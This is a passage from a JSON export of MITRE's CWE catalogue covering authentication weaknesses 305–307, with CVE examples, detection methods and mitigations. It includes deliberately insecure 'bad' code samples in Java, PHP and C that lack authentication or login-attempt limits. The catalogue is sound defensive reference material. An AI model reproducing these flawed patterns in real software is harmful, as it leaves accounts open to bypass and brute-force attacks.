attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity","Confidentiality"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Read Application Data","Execute Unauthorized Code or Commands"],"Note":"This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or allowing attackers to execute arbitrary code."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-2163","Description":"Shared secret not verified in a RADIUS response packet, allowing authentication bypass by spoofing server replies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2163"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Critical Step in Authentication"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"305":{"attr":{"@_ID":"305","@_Name":"Authentication Bypass by Primary Weakness","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1374","Description":"The provided password is only compared against the first character of the real password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1374"},{"Reference":"CVE-2000-0979","Description":"The password is not properly checked, which allows remote attackers to bypass access controls by sending a 1-byte password that matches the first character of the real password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0979"},{"Reference":"CVE-2001-0088","Description":"Chain: Forum software does not properly initialize an array, which inadvertently sets the password to a single character, allowing remote attackers to easily guess the password and gain administrative privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0088"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Bypass by Primary Weakness"}},"Notes":{"Note":{"#text":"Most \\"authentication bypass\\" errors are resultant, not primary.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"306":{"attr":{"@_ID":"306","@_Name":"Missing Authentication for Critical Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Other"],"Note":"Exposing critical functionality essentially provides an attacker with the privilege level of that functionality. The consequences will depend on the associated functionality, but they can range from reading or modifying sensitive data, access to administrative or other privileged functionality, or possibly even execution of arbitrary code."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-7.2"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authentication mechanisms."]},"Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-6.1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authentication. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authentication libraries.","Generally, automated static analysis tools have difficulty detecting custom authentication schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an established identity; an automated technique that detects the absence of authentication may report false positives."]},"Effectiveness":"Limited"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Identify which of these areas require a proven user identity, and use a centralized authentication capability.","Identify all potential communication channels, or other means of interaction with the software, to ensure that all channels are appropriately protected. Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will connect to the port.","In general, if the software or protocol allows a single session or user state to persist across multiple connections or channels, authentication and appropriate credential management need to be used throughout."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Where possible, avoid implementing custom authentication routines and consider using authentication capabilities as provided by the surrounding framework, operating system, or environment. These may make it easier to provide a clear separation between authentication tasks and authorization tasks.","In environments such as the World Wide Web, the line between authentication and authorization is sometimes blurred. If custom authentication routines are required instead of those provided by the server, then these routines must be applied to every single page, since these pages could be requested directly."]}},{"attr":{"@_Mitigation_ID":"MIT-4.5"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator [REF-45]."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the method createBankAccount is used to create a BankAccount object for a bank management application.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount createBankAccount(String accountNumber, String accountType,String accountName, String accountSSN, double balance) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount account = new BankAccount();account.setAccountNumber(accountNumber);account.setAccountType(accountType);account.setAccountOwnerName(accountName);account.setAccountOwnerSSN(accountSSN);account.setBalance(balance);return account;","xhtml:br":["","","","","","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private boolean isUserAuthentic = false;public boolean authenticateUser(String username, String password) {}public BankAccount createNewBankAccount(String accountNumber, String accountType,String accountName, String accountSSN, double balance) {}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// authenticate user,","// if user is authenticated then set variable to true","// otherwise set variable to false"],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount account = null;if (isUserAuthentic) {}return account;","xhtml:br":["","",""],"xhtml:div":{"#text":"account = new BankAccount();account.setAccountNumber(accountNumber);account.setAccountType(accountType);account.setAccountOwnerName(accountName);account.setAccountOwnerSSN(accountSSN);account.setBalance(balance);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}}]}}],"Body_Text":["However, there is no authentication mechanism to ensure that the user creating this bank account object has the authority to create new bank accounts. Some authentication mechanisms should be used to verify that the user has the authority to create bank account objects.","The following Java code includes a boolean variable and method for authenticating a user. If the user has not been authenticated then the createBankAccount will not create the bank account object."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1810","Description":"MFV. Access TFTP server without authentication and obtain configuration file with sensitive plaintext information.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1810"},{"Reference":"CVE-2008-6827","Description":"Agent software running at privileges does not authenticate incoming requests over an unprotected channel, allowing a Shatter\\" attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6827"},{"Reference":"CVE-2004-0213","Description":"Product enforces restrictions through a GUI but not through privileged APIs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213"},{"Reference":"CVE-2020-15483","Description":"monitor device allows access to physical UART debug port without authentication","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15483"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"No Authentication for Critical Function"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP31","Entry_Name":"Missing authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"12"}},{"attr":{"@_CAPEC_ID":"166"}},{"attr":{"@_CAPEC_ID":"36"}},{"attr":{"@_CAPEC_ID":"62"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Authentication,&#34; Page 36"}},{"attr":{"@_External_Reference_ID":"REF-257"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Notes":{"Note":{"#text":"This is separate from \\"bypass\\" issues in which authentication exists, but is faulty.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"No Authentication for Critical Function","attr":{"@_Date":"2010-02-16"}}}},"307":{"attr":{"@_ID":"307","@_Name":"Improper Restriction of Excessive Authentication Attempts","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more susceptible to brute force attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"799","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"An attacker could perform an arbitrary number of authentication attempts using different passwords, and eventually gain access to the targeted account."}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Forced Path Execution"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Common protection mechanisms include:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Disconnecting the user after a small number of failed attempts","Implementing a timeout","Locking out a targeted account","Requiring a computational task on the user\'s part."]}}}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator. [REF-45]"]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-117"},"Intro_Text":"In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts. The attacker targeted a member of Twitter\'s support team and was able to successfully guess the member\'s password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-236"}}}},{"Intro_Text":"The following code, extracted from a servlet\'s doPost() method, performs an authentication lookup every time the servlet is invoked.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String username = request.getParameter(\\"username\\");String password = request.getParameter(\\"password\\");int authResult = authenticateUser(username, password);","xhtml:br":["","",""]}},"Body_Text":"However, the software makes no attempt to restrict excessive authentication attempts."},{"Intro_Text":"This code attempts to limit the number of login attempts by causing the process to sleep before completing the authentication.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = $_POST[\'username\'];$password = $_POST[\'password\'];sleep(2000);$isAuthenticated = authenticateUser($username, $password);","xhtml:br":["","",""]}},"Body_Text":"However, there is no limit on parallel connections, so this does not increase the amount of time an attacker needs to complete an attack."},{"Intro_Text":"In the following C/C++ example the validateUser method opens a socket connection, reads a username and password from the socket and attempts to authenticate the username and password.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int validateUser(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int socket = openSocketConnection(host, port);if (socket &lt; 0) {}int isValidUser = 0;char username[USERNAME_SIZE];char password[PASSWORD_SIZE];while (isValidUser == 0) {}return(SUCCESS);","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open socket connection\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) &gt; 0) {}","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) &gt; 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}}}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int validateUser(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...int count = 0;while ((isValidUser == 0) &amp;&amp; (count &lt; MAX_ATTEMPTS)) {}if (isValidUser) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) &gt; 0) {}count++;","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) &gt; 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}},"xhtml:br":""}},{"#text":"return(SUCCESS);","attr":{"@_style":"margin-left:10px;"}},{"#text":"return(FAIL);","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"The validateUser method will continuously check for a valid username and password without any restriction on the number of authentication attempts made. The method should limit the number of authentication attempts made to prevent brute force attacks as in the following example code."},{"Intro_Text":"Consider this example from a\\n\\t\\t    real-world attack against the iPhone\\n\\t\\t    [REF-1218]. An attacker can use brute force\\n\\t\\t    methods; each time there is a failed guess, the\\n\\t\\t    attacker quickly cuts the power before the failed\\n\\t\\t    entry is recorded, effectively bypassing the\\n\\t\\t    intended limit on the number of failed\\n\\t\\t    authentication attempts. Note that this attack\\n\\t\\t    requires removal of the cell phone battery and\\n\\t\\t    connecting directly to the phone\'s power source,\\n\\t\\t    and the brute force attack is still\\n\\t\\t    time-consuming."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1152","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1152"},{"Reference":"CVE-2001-1291","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1291"},{"Reference":"CVE-2001-0395","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0395"},{"Reference":"CVE-2001-1339","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1339"},{"Reference":"CVE-2002-0628","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0628"},{"Reference":"CVE-1999-1324","Description":"User accounts not disabled when they exceed a threshold; possibly a resultant problem.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1324"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_ID":"AUTHENT.MULTFAIL","Entry_Name":"Multiple Failed Authentication Attempts not Prevented"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP34","Entry_Name":"Unrestricted authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-1218"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, 